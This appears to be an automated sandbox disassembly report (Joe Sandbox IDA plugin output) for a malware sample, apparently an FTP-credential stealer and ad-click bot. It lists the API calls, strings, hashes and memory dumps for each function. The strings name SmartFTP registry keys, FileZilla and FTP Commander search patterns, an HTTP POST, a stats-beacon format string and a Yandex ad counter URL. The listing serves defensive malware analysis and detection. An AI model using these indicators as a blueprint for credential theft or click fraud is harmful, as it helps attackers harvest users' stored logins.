Function 0040A8F9 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 161sleepmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
Sleep.KERNEL32(00002710), ref: 0040AAC1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
HeapFree.KERNEL32(00000000), ref: 0040AAF0

Strings

jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
0, xrefs: 0040AA5B

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: HeapSleep$AttemptConnectFreeInternetProcess
String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
API String ID: 3713053250-1268808612
Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407499 Relevance: 9.1, APIs: 6, Instructions: 62timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?), ref: 004074AD
GetLocalTime.KERNEL32(00000000), ref: 004074B3
GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
String ID:
API String ID: 3777474486-0
Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083C4 Relevance: 9.1, APIs: 6, Instructions: 61filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
CloseHandle.KERNEL32(?), ref: 00408452

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00409DF4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00

Strings

POST, xrefs: 00409EBD

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: HttpInternetRequest$ConnectFileOpenReadSend
String ID: POST
API String ID: 961146071-1814004025
Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405136 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB

Strings

folder, xrefs: 00405184
SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
personal favorites, xrefs: 00405176
SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: EnvironmentExpandOpenStrings
String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
API String ID: 3923277744-821743658
Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0B5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040A0C0
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

AtlAxWin, xrefs: 0040A0ED
Shell.Explorer, xrefs: 0040A0E8

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CreateHandleInitializeModuleWindow
String ID: AtlAxWin$Shell.Explorer
API String ID: 950422046-1300462704
Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65

Uniqueness

Uniqueness Score: -1.00%

Function 00407267 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
__aulldiv.LIBCMT ref: 004072E3

Strings

c{@, xrefs: 004072D3

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: c{@
API String ID: 3735792614-264719814
Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5

Uniqueness

Uniqueness Score: -1.00%

Function 004072ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
__aulldiv.LIBCMT ref: 00407359

Strings

n(@, xrefs: 0040734C, 00407357

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: n(@
API String ID: 3735792614-2525614082
Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
CharLowerW.USER32(?), ref: 0040ABA0
GetCommandLineW.KERNEL32 ref: 0040ABC0

Strings

netprotdrvss.exe, xrefs: 0040ABA6
/updatefile3, xrefs: 0040ABC6

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CharCommandFileLineLowerModuleName
String ID: /updatefile3$netprotdrvss.exe
API String ID: 3118597399-3449771660
Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409FB1 Relevance: 7.6, APIs: 5, Instructions: 53windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409FCE
GetTickCount.KERNEL32 ref: 00409FDE
Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
DispatchMessageW.USER32(?), ref: 0040A009

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00409F2B Relevance: 7.5, APIs: 5, Instructions: 40windowsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00409F5B
GetTickCount.KERNEL32 ref: 00409F5F
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
DispatchMessageW.USER32(?), ref: 00409F80
Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
Opcode Fuzzy Hash: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58

Uniqueness

Uniqueness Score: -1.00%

Function 00408692 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
SysFreeString.OLEAUT32(?), ref: 0040875A

Strings

+@, xrefs: 004086A0
http://, xrefs: 00408711

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
String ID: http://$+@
API String ID: 147727044-3628382792
Opcode ID: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
Opcode Fuzzy Hash: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407D61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

x, xrefs: 00407DEF
UniqueNum, xrefs: 00407D86

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: File$CreateModuleNamePointerWrite
String ID: UniqueNum$x
API String ID: 594998759-2399716736
Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799

Uniqueness

Uniqueness Score: -1.00%

Function 004040E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

*filezilla*, xrefs: 004040F6
#, xrefs: 0040411E
&, xrefs: 00404110

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$*filezilla*
API String ID: 3438805939-758400021
Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00404A92 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

&, xrefs: 00404ABB
ftp*commander*, xrefs: 00404AA1
#, xrefs: 00404AC9

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$ftp*commander*
API String ID: 3438805939-1149875651
Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409445 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094A9
SysFreeString.OLEAUT32(?), ref: 004094AE

Strings

an.yandex.ru/count, xrefs: 00409478
_blank, xrefs: 0040948E

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID: _blank$an.yandex.ru/count
API String ID: 3341692771-25359924
Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69

Uniqueness

Uniqueness Score: -1.00%

Function 00409808 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409868
SysAllocString.OLEAUT32(?), ref: 00409876

Strings

"URL", xrefs: 00409838
"encrypted", xrefs: 00409815

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: "URL"$"encrypted"
API String ID: 2525500382-4151690107
Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040978D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004097ED
SysAllocString.OLEAUT32(?), ref: 004097FB

Strings

"domain", xrefs: 004097BD
"url", xrefs: 0040979A

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
